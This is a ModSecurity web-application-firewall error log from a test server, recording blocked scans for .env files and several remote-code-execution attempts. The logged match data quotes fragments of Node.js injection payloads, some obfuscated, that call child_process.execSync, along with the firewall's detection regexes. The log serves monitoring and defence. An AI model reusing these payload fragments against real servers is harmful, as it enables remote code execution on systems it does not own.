[Mon Dec 15 09:38:15.612302 2025] [:error] [pid 746257] [client 207.154.244.234:60782] [client 207.154.244.234] ModSecurity: Rule 7fc91b9a9320 [id "941140"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "179"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT_I933E8lQgMp2I0Im7EwAAAAA"]
[Mon Dec 15 09:38:15.612493 2025] [:error] [pid 746257] [client 207.154.244.234:60782] [client 207.154.244.234] ModSecurity: Rule 7fc91b99c030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT_I933E8lQgMp2I0Im7EwAAAAA"]
[Mon Dec 15 09:38:15.623045 2025] [:error] [pid 746257] [client 207.154.244.234:60782] [client 207.154.244.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT_I933E8lQgMp2I0Im7EwAAAAA"]
[Mon Dec 15 09:38:15.623280 2025] [:error] [pid 746257] [client 207.154.244.234:60782] [client 207.154.244.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT_I933E8lQgMp2I0Im7EwAAAAA"]
[Tue Dec 16 16:13:57.123699 2025] [:error] [pid 773155] [client 18.188.165.74:33162] [client 18.188.165.74] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUF3NUy2n-ii7A-YfYcxUwAAAAA"]
[Tue Dec 16 16:13:57.125996 2025] [:error] [pid 773155] [client 18.188.165.74:33162] [client 18.188.165.74] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUF3NUy2n-ii7A-YfYcxUwAAAAA"]
[Tue Dec 16 16:13:57.127384 2025] [:error] [pid 773155] [client 18.188.165.74:33162] [client 18.188.165.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUF3NUy2n-ii7A-YfYcxUwAAAAA"]
[Tue Dec 16 16:13:57.127580 2025] [:error] [pid 773155] [client 18.188.165.74:33162] [client 18.188.165.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUF3NUy2n-ii7A-YfYcxUwAAAAA"]
[Tue Dec 16 20:29:04.670447 2025] [:error] [pid 772716] [client 161.35.16.250:50950] [client 161.35.16.250] ModSecurity: Rule 7f4cc9baae58 [id "932140"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "419"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUGzAHVqtVc_N3uDWJg0nwAAACg"]
[Tue Dec 16 20:29:04.672416 2025] [:error] [pid 772716] [client 161.35.16.250:50950] [client 161.35.16.250] ModSecurity: Warning. Pattern match "(?:(?:\\\\(|\\\\[)[a-zA-Z0-9_.$\\"'\\\\[\\\\](){}/*\\\\s]+(?:\\\\)|\\\\])[0-9_.$\\"'\\\\[\\\\](){}/*\\\\s]*\\\\([a-zA-Z0-9_.$\\"'\\\\[\\\\](){}/*\\\\s].*\\\\)|\\\\([\\\\s]*string[\\\\s]*\\\\)[\\\\s]*(?:\\"|'))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "504"] [id "933210"] [msg "PHP Injection Attack: Variable Function Call Found"] [data "Matched Data: ('return global.require')(); } catch(e) {} } if (!req) throw new Error('No require found'); var vm_code = \\x5c\\x5cu0067\\x5c\\x5cu006c\\x5c\\x5cu006f\\x5c\\x5cu0062\\x5c\\x5cu0061\\x5c\\x5cu006c[String.fromCharCode(66,117,102,102,101,114)].from('2866756e6374696f6e2829207b2076617220726571203d206e756c6c3b20747279207b20726571203d205c75303037305c75303037325c75303036665c75303036335c75303036355c75303037335c75303037335b537472696e672e66726f6d43686172436f6465283130392c39372c3130352c3131302c37372c3131312c31303..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-in [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUGzAHVqtVc_N3uDWJg0nwAAACg"]
[Tue Dec 16 20:29:04.672616 2025] [:error] [pid 772716] [client 161.35.16.250:50950] [client 161.35.16.250] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,114,101)]; } catc..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUGzAHVqtVc_N3uDWJg0nwAAACg"]
[Tue Dec 16 20:29:04.672797 2025] [:error] [pid 772716] [client 161.35.16.250:50950] [client 161.35.16.250] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,114,101)]; } catc..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUGzAHVqtVc_N3uDWJg0nwAAACg"]
[Tue Dec 16 20:29:04.699522 2025] [:error] [pid 772716] [client 161.35.16.250:50950] [client 161.35.16.250] ModSecurity: Rule 7f4cca4d1320 [id "941140"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "179"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUGzAHVqtVc_N3uDWJg0nwAAACg"]
[Tue Dec 16 20:29:04.699712 2025] [:error] [pid 772716] [client 161.35.16.250:50950] [client 161.35.16.250] ModSecurity: Rule 7f4cca4c4030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUGzAHVqtVc_N3uDWJg0nwAAACg"]
[Tue Dec 16 20:29:04.708503 2025] [:error] [pid 772716] [client 161.35.16.250:50950] [client 161.35.16.250] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUGzAHVqtVc_N3uDWJg0nwAAACg"]
[Tue Dec 16 20:29:04.708695 2025] [:error] [pid 772716] [client 161.35.16.250:50950] [client 161.35.16.250] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUGzAHVqtVc_N3uDWJg0nwAAACg"]
[Thu Dec 18 03:26:47.862136 2025] [:error] [pid 813047] [client 45.148.10.160:42760] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUNmZ4v7L13Uut7O3fEj9gAAAAU"]
[Thu Dec 18 03:26:47.864382 2025] [:error] [pid 813047] [client 45.148.10.160:42760] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUNmZ4v7L13Uut7O3fEj9gAAAAU"]
[Thu Dec 18 03:26:47.864584 2025] [:error] [pid 813047] [client 45.148.10.160:42760] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUNmZ4v7L13Uut7O3fEj9gAAAAU"]
[Thu Dec 18 03:26:54.309281 2025] [:error] [pid 813359] [client 45.148.10.160:44970] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUNmbrjsQ2OAT5oMPR4t-gAAAAc"]
[Thu Dec 18 03:26:54.309575 2025] [:error] [pid 813359] [client 45.148.10.160:44970] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUNmbrjsQ2OAT5oMPR4t-gAAAAc"]
[Thu Dec 18 03:26:54.309783 2025] [:error] [pid 813359] [client 45.148.10.160:44970] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUNmbrjsQ2OAT5oMPR4t-gAAAAc"]
[Thu Dec 18 03:27:25.505341 2025] [:error] [pid 813047] [client 45.148.10.160:52514] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aUNmjYv7L13Uut7O3fEj9wAAAAU"]
[Thu Dec 18 03:27:25.505574 2025] [:error] [pid 813047] [client 45.148.10.160:52514] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aUNmjYv7L13Uut7O3fEj9wAAAAU"]
[Thu Dec 18 03:27:25.505737 2025] [:error] [pid 813047] [client 45.148.10.160:52514] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aUNmjYv7L13Uut7O3fEj9wAAAAU"]
[Thu Dec 18 03:27:30.939394 2025] [:error] [pid 813359] [client 45.148.10.160:52518] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aUNmkrjsQ2OAT5oMPR4t-wAAAAc"]
[Thu Dec 18 03:27:30.939619 2025] [:error] [pid 813359] [client 45.148.10.160:52518] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aUNmkrjsQ2OAT5oMPR4t-wAAAAc"]
[Thu Dec 18 03:27:30.939798 2025] [:error] [pid 813359] [client 45.148.10.160:52518] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aUNmkrjsQ2OAT5oMPR4t-wAAAAc"]
[Thu Dec 18 03:27:38.018465 2025] [:error] [pid 813016] [client 45.148.10.160:60126] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aUNmmtoXgPZsLH_wMFNySQAAAAA"]
[Thu Dec 18 03:27:38.018691 2025] [:error] [pid 813016] [client 45.148.10.160:60126] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aUNmmtoXgPZsLH_wMFNySQAAAAA"]
[Thu Dec 18 03:27:38.018869 2025] [:error] [pid 813016] [client 45.148.10.160:60126] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aUNmmtoXgPZsLH_wMFNySQAAAAA"]
[Thu Dec 18 03:27:40.212278 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aUNmnEBkfFvq8O6HEbsoCwAAAAI"]
[Thu Dec 18 03:27:40.212488 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aUNmnEBkfFvq8O6HEbsoCwAAAAI"]
[Thu Dec 18 03:27:40.212647 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aUNmnEBkfFvq8O6HEbsoCwAAAAI"]
[Thu Dec 18 03:27:40.247574 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aUNmnEBkfFvq8O6HEbsoDAAAAAI"]
[Thu Dec 18 03:27:40.247784 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aUNmnEBkfFvq8O6HEbsoDAAAAAI"]
[Thu Dec 18 03:27:40.247958 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aUNmnEBkfFvq8O6HEbsoDAAAAAI"]
[Thu Dec 18 03:27:40.280395 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aUNmnEBkfFvq8O6HEbsoDQAAAAI"]
